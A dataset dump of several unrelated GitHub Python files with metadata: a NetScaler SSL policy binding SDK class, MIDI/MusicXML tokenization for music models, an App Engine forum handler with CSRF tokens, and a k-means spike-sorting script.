radiant.append(hero['id'])\n\n for hero in dire_heroes:\n dire.append(hero['id'])\n\n\n radiant_lineup = models.Lineup(radiant)\n dire_lineup = models.Lineup(dire)\n\n return {\n 'radiant': radiant_lineup,\n 'dire': dire_lineup\n }\n","repo_name":"scsper/dota-lineup-analyzer","sub_path":"old/server/services/lineup_service.py","file_name":"lineup_service.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2623855874","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslvserver_sslpolicy_binding(base_resource) :\n\t\"\"\" Binding class showing the sslpolicy that can be bound to sslvserver.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._policyname = None\n\t\tself._priority = None\n\t\tself._type = None\n\t\tself._polinherit = None\n\t\tself._gotopriorityexpression = None\n\t\tself._invoke = None\n\t\tself._labeltype = None\n\t\tself._labelname = None\n\t\tself._vservername = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service.
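The geo2helio record above reduces to a quadratic: with a = 1, the multiplier alpha solving |r_so + alpha * rhat_ob| = d has b = 2 r_so . rhat_ob and c = |r_so|^2 - d^2, and the larger non-negative root is kept. A quick numerical check of that identity with made-up vectors:

import numpy as np

r_so = np.array([1.0, 0.0, 0.0])    # Sun -> observer vector (AU)
rhat = np.array([0.0, 1.0, 0.0])    # observer -> object unit vector
d = 2.0                             # target heliocentric distance

b = 2 * np.dot(rhat, r_so)
c = -(d**2 - np.dot(r_so, r_so))
alpha = max(np.roots([1.0, b, c]))  # same two roots as the closed form in geo2helio

# the object position r_so + alpha * rhat is indeed at distance d from the Sun
assert np.isclose(np.linalg.norm(r_so + alpha * rhat), d)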
    Minimum value = 0
    Maximum value = 65534.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"The priority of the policies bound to this SSL service.
    Minimum value = 0
    Maximum value = 65534\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef policyname(self) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@policyname.setter\n\tdef policyname(self, policyname) :\n\t\tr\"\"\"The name of the SSL policy binding.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._policyname = policyname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labelname(self) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labelname.setter\n\tdef labelname(self, labelname) :\n\t\tr\"\"\"Name of the label to invoke if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labelname = labelname\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef vservername(self) :\n\t\tr\"\"\"Name of the SSL virtual server.
    Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@vservername.setter\n\tdef vservername(self, vservername) :\n\t\tr\"\"\"Name of the SSL virtual server.
    Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._vservername = vservername\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef gotopriorityexpression(self) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@gotopriorityexpression.setter\n\tdef gotopriorityexpression(self, gotopriorityexpression) :\n\t\tr\"\"\"Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._gotopriorityexpression = gotopriorityexpression\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef invoke(self) :\n\t\tr\"\"\"Invoke flag. This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@invoke.setter\n\tdef invoke(self, invoke) :\n\t\tr\"\"\"Invoke flag. This attribute is relevant only for ADVANCED policies.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._invoke = invoke\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef type(self) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert.
    Default value: REQUEST
    Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@type.setter\n\tdef type(self, type) :\n\t\tr\"\"\"Bind point to which to bind the policy. Possible Values: HANDSHAKE_REQ, HANDSHAKE_RES, CLIENTHELLO_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES and REQUEST. These bindpoints mean:\n\t\t1. HANDSHAKE_REQ: Policy evaluation will be done at the end of handshake on request side (request side means between client and NetScaler)\n\t\t2. HANDSHAKE_RES: Policy evaluation will be done at the end of hadnshake on response side (response side means between Netscaler and server)\n\t\t3. INTERCEPT_REQ: Policy evaluation will be done after receiving Client Hello on request side.\n\t\t4. CLIENTCERT_REQ: Policy evaluation will be done after receiving Client Certificate on request side.\n\t\t5. SERVERHELLO_RES: Policy evaluation will be done after receiving Server Hello on response side.\n\t\t6. SERVERCERT_RES: Policy evaluation will be done after receiving Server Certificate on response side.\n\t\t7. SERVERHELLO_DONE_RES: Policy evaluation will be done after receiving Server Hello Done on response side.\n\t\t8. REQUEST: Policy evaluation will be done at appplication above SSL. This bindpoint is default and is used for actions based on clientauth and client cert.
    Default value: REQUEST
    Possible values = HANDSHAKE_REQ, HANDSHAKE_RES, INTERCEPT_REQ, CLIENTCERT_REQ, SERVERHELLO_RES, SERVERCERT_RES, SERVERHELLO_DONE_RES, REQUEST\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._type = type\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef labeltype(self) :\n\t\tr\"\"\"Type of policy label invocation.
    Possible values = vserver, service, policylabel.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@labeltype.setter\n\tdef labeltype(self, labeltype) :\n\t\tr\"\"\"Type of policy label invocation.
    Possible values = vserver, service, policylabel\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._labeltype = labeltype\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef polinherit(self) :\n\t\tr\"\"\"Whether the bound policy is a inherited policy or not.
    Minimum value = 0
    Maximum value = 254.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._polinherit\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslvserver_sslpolicy_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslvserver_sslpolicy_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.vservername is not None :\n\t\t\t\treturn str(self.vservername)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslvserver_sslpolicy_binding()\n\t\t\t\tupdateresource.vservername = resource.vservername\n\t\t\t\tupdateresource.policyname = resource.policyname\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\tupdateresource.gotopriorityexpression = resource.gotopriorityexpression\n\t\t\t\tupdateresource.invoke = resource.invoke\n\t\t\t\tupdateresource.labeltype = resource.labeltype\n\t\t\t\tupdateresource.labelname = resource.labelname\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tupdateresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\t\t\tupdateresources[i].gotopriorityexpression = resource[i].gotopriorityexpression\n\t\t\t\t\t\tupdateresources[i].invoke = resource[i].invoke\n\t\t\t\t\t\tupdateresources[i].labeltype = resource[i].labeltype\n\t\t\t\t\t\tupdateresources[i].labelname = resource[i].labelname\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslvserver_sslpolicy_binding()\n\t\t\t\tdeleteresource.vservername = resource.vservername\n\t\t\t\tdeleteresource.policyname = resource.policyname\n\t\t\t\tdeleteresource.priority = resource.priority\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslvserver_sslpolicy_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].vservername = resource[i].vservername\n\t\t\t\t\t\tdeleteresources[i].policyname = resource[i].policyname\n\t\t\t\t\t\tdeleteresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef 
get(cls, service, vservername=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch sslvserver_sslpolicy_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not vservername :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\t\tobj.vservername = vservername\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to fetch filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, vservername) :\n\t\tr\"\"\" Use this API to count sslvserver_sslpolicy_binding resources configued on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, vservername, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslvserver_sslpolicy_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslvserver_sslpolicy_binding()\n\t\t\tobj.vservername = vservername\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tclass Ecccurvename:\n\t\tALL = \"ALL\"\n\t\tP_224 = \"P_224\"\n\t\tP_256 = \"P_256\"\n\t\tP_384 = \"P_384\"\n\t\tP_521 = \"P_521\"\n\n\tclass Ocspcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Crlcheck:\n\t\tMandatory = \"Mandatory\"\n\t\tOptional = \"Optional\"\n\n\tclass Type:\n\t\tHANDSHAKE_REQ = \"HANDSHAKE_REQ\"\n\t\tHANDSHAKE_RES = \"HANDSHAKE_RES\"\n\t\tINTERCEPT_REQ = \"INTERCEPT_REQ\"\n\t\tCLIENTCERT_REQ = \"CLIENTCERT_REQ\"\n\t\tSERVERHELLO_RES = \"SERVERHELLO_RES\"\n\t\tSERVERCERT_RES = \"SERVERCERT_RES\"\n\t\tSERVERHELLO_DONE_RES = \"SERVERHELLO_DONE_RES\"\n\t\tREQUEST = \"REQUEST\"\n\n\tclass Labeltype:\n\t\tvserver = \"vserver\"\n\t\tservice = \"service\"\n\t\tpolicylabel = \"policylabel\"\n\nclass sslvserver_sslpolicy_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslvserver_sslpolicy_binding = []\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslvserver_sslpolicy_binding = [sslvserver_sslpolicy_binding() for _ in 
range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslvserver_sslpolicy_binding.py","file_name":"sslvserver_sslpolicy_binding.py","file_ext":"py","file_size_in_byte":12851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"2661690726","text":"import os\nimport torch\nimport numpy as np\nimport copy\nimport partitura as pt\nfrom einops import rearrange, repeat\nimport pandas as pd\nfrom miditoolkit import MidiFile\nfrom einops import repeat\nimport utils as utils\n\n\ndef clip_segs(tokens, cfg):\n \"\"\"clip the token sequence according to segmentation scheme\n\n Return:\n seg_tokens: np.array: (n_segs, seg_length)\n \"\"\"\n\n \"\"\"choose the number of segments to clip\"\"\"\n if cfg.segmentation.seg_type == \"fix_num\":\n n_segs = cfg.experiment.n_segs\n l = int(len(tokens) / cfg.experiment.n_segs)\n elif cfg.segmentation.seg_type == \"fix_size\":\n n_segs = int(len(tokens) / cfg.sequence.max_seq_len) + 1\n l = cfg.sequence.max_seq_len\n\n\n \"\"\"Clip rolls into segments and add padding\"\"\"\n seg_tokens = []\n for i in range(n_segs): \n seg_tokens.append(tokens[ i*l: i*l+l ][:cfg.sequence.max_seq_len])\n return seg_tokens\n\n\ndef pad_segs(seg_tokens, cfg):\n if cfg.sequence.mid_encoding == \"CPWord\":\n seg_tokens = [np.concatenate([seg_token, repeat(np.array([0] * 6), 'd -> k d', k=( cfg.sequence.max_seq_len - len(seg_token)))])\n for seg_token in seg_tokens if seg_token] \n seg_tokens = [np.pad(seg_token, (0, cfg.sequence.max_seq_len - len(seg_token)), mode=\"constant\", constant_values=0)\n for seg_token in seg_tokens]\n return np.array(seg_tokens) # ()\n \n\ndef perfmidi_to_sequence(path, tokenizer, cfg):\n \"\"\"Process MIDI events to sequences using miditok\n - segment the sequence in various segmentation scheme, and then pad the sequences\n \n Returns:\n seg_tokens: (n_segs, max_seq_len)\n \"\"\"\n midi = MidiFile(path)\n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in midi and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n mapping = midi.get_tick_to_time_mapping()\n instrument_track = copy.deepcopy(midi.instruments[0])\n while True:\n # _midi = copy.deepcopy(midi)\n # instrument_track = _midi.instruments[0]\n start, end = (i)*cfg.segmentation.seg_time, (i+1)*cfg.segmentation.seg_time \n midi.instruments[0].notes = [note for note in instrument_track.notes \n if (note.start < len(mapping) and \n (mapping[note.start] < end and (mapping[note.start]) > start))]\n if not midi.instruments[0].notes:\n break\n print(len(midi.instruments[0].notes))\n tokens = tokenizer(midi)[0]\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n i += 1\n else:\n tokens = tokenizer(midi)[0] # (l, )\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg)\n\n seg_tokens = pad_segs(seg_tokens, cfg)\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef musicxml_to_sequence(path, tokenizer, cfg):\n \"\"\"Process musicxml to sequences using miditok\"\"\"\n import warnings\n warnings.filterwarnings(\"ignore\") # mute partitura warnings\n\n try:\n score = pt.load_musicxml(path)\n if \"Kreisleriana,_Op._16/VIII._Schnell_und_spielend/\" in path:\n raise RuntimeError\n except Exception as e:\n 
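The clip_segs/pad_segs pair above implements the fix_size scheme as ceil-style windowing plus right-padding to max_seq_len. The same arithmetic on plain lists, with an arbitrary window size standing in for cfg.sequence.max_seq_len:

def clip_fixed_size(tokens, max_seq_len=8):
    # int(len/max)+1 windows, mirroring the fix_size branch above
    n_segs = len(tokens) // max_seq_len + 1
    return [tokens[i * max_seq_len:(i + 1) * max_seq_len] for i in range(n_segs)]

def pad(seg, max_seq_len=8, pad_id=0):
    return seg + [pad_id] * (max_seq_len - len(seg))

segs = [pad(s) for s in clip_fixed_size(list(range(19))) if s]
assert [len(s) for s in segs] == [8, 8, 8]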
print(\"Failed on score {} with exception {}\".format(os.path.splitext(os.path.basename(path))[0], e))\n return None\n \n if cfg.segmentation.seg_type == \"fix_time\":\n \"\"\"For the fix_time segmentation, we get different segments in score and then tokenize them\"\"\"\n seg_tokens, i = [], 0\n for i in range(int(score.note_array()['onset_beat'].max() / cfg.segmentation.seg_beat) + 1):\n tokens = tokenizer.track_to_tokens(score, start_end_beat=(i*cfg.segmentation.seg_beat, (i+1)*cfg.segmentation.seg_beat))\n utils.try_save_BPE_tokens(tokenizer, tokens, cfg)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens.append(tokens[:cfg.sequence.max_seq_len])\n print(len(tokens))\n else:\n tokens = tokenizer.track_to_tokens(score)\n if cfg.sequence.BPE:\n tokens = tokenizer.apply_bpe(tokens)\n seg_tokens = clip_segs(tokens, cfg) \n\n seg_tokens = pad_segs(seg_tokens, cfg)\n\n assert(seg_tokens.shape[1] == cfg.sequence.max_seq_len)\n return seg_tokens # (s l)\n\n\ndef batch_to_sequence(batch, cfg, device, tokenizer):\n \"\"\"Map the batch to input token sequences \n\n Args:\n batch (2, b): ([path, path, ...], [label, label, ...])\n Returns: (matrix, label)\n batch_sequence: (b, )\n batch_label: (b, )\n \"\"\"\n files, labels = batch\n b = len(batch[0])\n batch_sequence, batch_labels = [], []\n\n for idx, (path, l) in enumerate(zip(files, labels)):\n # print(path)\n recompute = True\n if cfg.experiment.load_data: # load existing data\n res = utils.load_data(path, cfg)\n if type(res) == np.ndarray: # keep computing if not exist\n seg_sequences = res\n recompute = False\n\n # events = tokenizer.tokens_to_events(list(seg_sequences[0]))\n if recompute:\n if cfg.experiment.input_format == \"perfmidi\":\n seg_sequences = perfmidi_to_sequence(path, tokenizer, cfg)\n elif cfg.experiment.input_format == \"musicxml\":\n res = musicxml_to_sequence(path, tokenizer, cfg)\n if type(res) == np.ndarray:\n seg_sequences = res\n else: # in case that the xml has parsing error, we skip and copy existing data at the end.\n continue\n\n utils.save_data(path, seg_sequences, cfg)\n\n batch_sequence.append(seg_sequences)\n batch_labels.append(l)\n \n if cfg.experiment.tmp:\n example = batch_sequence[10][0, :50]\n for e in tokenizer.tokens_to_events(example):\n print(e)\n # byte_counts = []\n # for piece_segments in batch_sequence:\n # total_bytes = 0\n # for ss in piece_segments:\n # total_bytes += np.array(ss).nbytes\n # byte_counts.append(total_bytes)\n # byte_counts = np.array(byte_counts)\n batch_sequence, batch_labels = utils.pad_batch(b, cfg, device, batch_sequence, batch_labels)\n batch_sequence = torch.tensor(np.array(batch_sequence), device=device, dtype=torch.float32) \n return batch_sequence, batch_labels\n","repo_name":"anusfoil/SymRep","sub_path":"converters/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"36052795392","text":"from handlers.base import BaseHandler\nfrom google.appengine.api import users, memcache\nfrom models.models import Topic, Comment\nimport uuid\nimport datetime\n\nclass TopicAdd(BaseHandler):\n def get(self):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n params = {\"csrf_token\": csrf_token}\n return self.render_template(\"topic_add.html\", params=params)\n\n def post(self):\n user = users.get_current_user()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = 
memcache.get(key=csrf_token)\n\n if not mem_token:\n return self.write(\"Hacker at the doors\")\n\n title = self.request.get(\"title\")\n text = self.request.get(\"text\")\n\n new_topic = Topic(title=title, content=text, author_email=user.email())\n new_topic.put()\n\n return self.redirect_to(\"topic-details\", topic_id=new_topic.key.id())\n\n\nclass TopicDetails(BaseHandler):\n def get(self, topic_id):\n csrf_token = str(uuid.uuid4())\n memcache.add(key=csrf_token, value=True, time=600)\n\n topic = Topic.get_by_id(int(topic_id))\n comment = Comment.query(Comment.topic_id == topic.key.id()).order(Comment.created).fetch()\n\n params = {\"topic\": topic, \"comment\": comment, \"csrf_token\": csrf_token}\n\n return self.render_template(\"topic_details.html\", params=params)\n\n\nclass CommentAdd(BaseHandler):\n def post(self, topic_id):\n user = users.get_current_user()\n time = datetime.datetime.now()\n\n csrf_token = self.request.get(\"csrf_token\")\n mem_token = memcache.get(key=csrf_token)\n\n if not mem_token:\n return self.write(\"Hacker at the doors\")\n\n comment = self.request.get(\"comment\")\n topic = Topic.get_by_id(int(topic_id))\n new_comment = Comment(content=comment, topic_id=topic.key.id(), author_email=user.email(),\n topic_title=topic.title, created=time)\n new_comment.put()\n\n return self.redirect_to(\"topic-details\", topic_id=topic.key.id())","repo_name":"RokP85/7.DN","sub_path":"wd2-boilerplate-master/handlers/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42244718093","text":"\nimport numpy as np\nimport random as rand\nfrom matplotlib import pyplot as plt\nfrom peak_detect import detect_peaks\nfrom time import time\n\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\nfrom scipy.spatial import distance\nimport matplotlib as mpl\nfrom matplotlib.pyplot import cm \n\n\n#########################################################\n# The following code applies the K-means algorithm to a signal\n# in three steps: spike detection, alignment of spikes and k-means clustering\n\n\n# Question 1: we have to manually set the window length/convolution window;\n# since we use a convolution window to find spikes, the convolution result may not give\n# us the best estimate\n\n# Question 2: the local maxima determine our result in k-means\n\n###########################################################################\n\n# process_spike function will detect spikes in the input signal and align them:\n# input: \n# signal: the input signal\n# window_len: the manually set length for the window in convolution\n# take_window_len: chop-off length for a spike\n# window_height: the manually set height for the window in convolution\n# noise_level: the lower bound parameter in the find-local-maxima function\n\n# output: the aligned spikes in a 2-D array detected_spikes\n\ndef process_spike(signal, window_len, take_window_len,noise_level, window_height=2):\n\t\n\t################################################\n\t# Step 1: take the absolute value of signal\n\t\n\tsignal_abs=list(map(abs,signal))\n\t#signal_abs=np.array(signal)**2\n\t\n\t# Step 2: take convolution of the absolute value\n\tweights = np.repeat(window_height, window_len)\n\tconvolution=np.convolve(weights,signal_abs,'same')\n\tconvolution=convolution/window_len\n\n\tplt.plot(convolution)\n\tplt.show()\n\n\t# Step 3: find the indices of 
local maxima of the convolution\n\tlocal_max=detect_peaks(convolution, mph=noise_level*5, mpd=window_len,threshold=0, edge='rising',\n kpsh=False, valley=False, show=False)\n\n\t# Step 4: locate/save spike vectors\n\tm=len(local_max)\n\tn=take_window_len\n\tdetected_spikes=np.zeros((m,n))\n\tindex=0\n\tfor item in local_max:\n\t\tdetected_spikes[index]=signal[item-take_window_len/2:item+take_window_len/2]\n\t\tindex=index+1\n\tdetected_spikes1=detected_spikes.copy()\n\n\t#return detected_spikes\n\n\t# Step 5: align spikes \n\tk=rand.randint(0,m-1)\n\tmax_location=detected_spikes[k].argmax(axis=0)\n\tfor i in range(0,m-1):\n\t\tspike_max_location=detected_spikes[i].argmax(axis=0)\n\t\tdistance=max_location-spike_max_location\n\t\tdetected_spikes[i]=np.roll(detected_spikes[i],distance)\n\n\treturn detected_spikes\n\n\n\n#######################################################################\n# K_means_spikeDetection function will perform k-means algorithm on \n# aligned spikes\n\n\ndef k_means_spikeDetection(aligned_spikes,num_cluster,iterations=20):\n\t# Initialize spikes with lables\n\tm=aligned_spikes.shape[0]#num of points\n\tn=aligned_spikes.shape[1]#dim of the points\n\t\n\t# Take initialize centers\n\tk=np.random.permutation(m)\n\tinitial_center=np.zeros((num_cluster,n))\n\n\t#return initial_center\n\tfor num in range(num_cluster):\n\t\tinitial_center[num]=aligned_spikes[k[num]]\n\n\t# Main loop:\n\tcenter_vectors=initial_center\n\tfor ite in range(iterations):\n\t\t\n\t\t# Determine clusters by computing the Eculidean distance\n\t\tclusters_distance=distance.cdist(aligned_spikes,center_vectors,'euclidean',p=2)\n\t\tlabel=clusters_distance.argmin(axis=1)\n\t\t\n\t\tclassified_spikes=np.c_[aligned_spikes,label]\n\n\t\t# assign each vector in aligned_spikes a group\t\t\n\t\tfor index in range(0,num_cluster):\n\t\t\tcluster_vector=aligned_spikes[label==index]\n\t\t\tnumber=cluster_vector.shape[0]\n\n\t\t\t# Get new center by averaging vectors in a certain group\n\t\t\tcenter_vectors[index]=1.0/number*np.sum(cluster_vector,axis=0)\t\t\t\n\n\treturn center_vectors,label\n\n\ndef plot_kMeans_clusters(classified_spikes,center_vectors,num_cluster):\n\tcolor=cm.rainbow(np.linspace(0,1,num_cluster))\n\n\tfor i in range(num_cluster):\n\t\tplt.plot(center_vectors[i])\n\t\tplt.savefig('image/classifed_centers.png')\n\n\tfor index_i in range(0,num_cluster):\n\t\tcluster_vector=classified_spikes[classified_spikes[:,-1]==index_i]\n\t\tnumber=cluster_vector.shape[0]\n\n\t\tfor index_j in range(0,number):\n\t\t\t#plt.subplot(index)\n\t\t\tplt.plot(cluster_vector[index_j],color=color[index_i])\n\t\t\t#plt.show()\n\n\t\tplt.savefig('image/clusters.png')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"YueXX/spike-sorting-project","sub_path":"backup_code/k_means_Eculidean2Norm.py","file_name":"k_means_Eculidean2Norm.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21999113490","text":"goods = 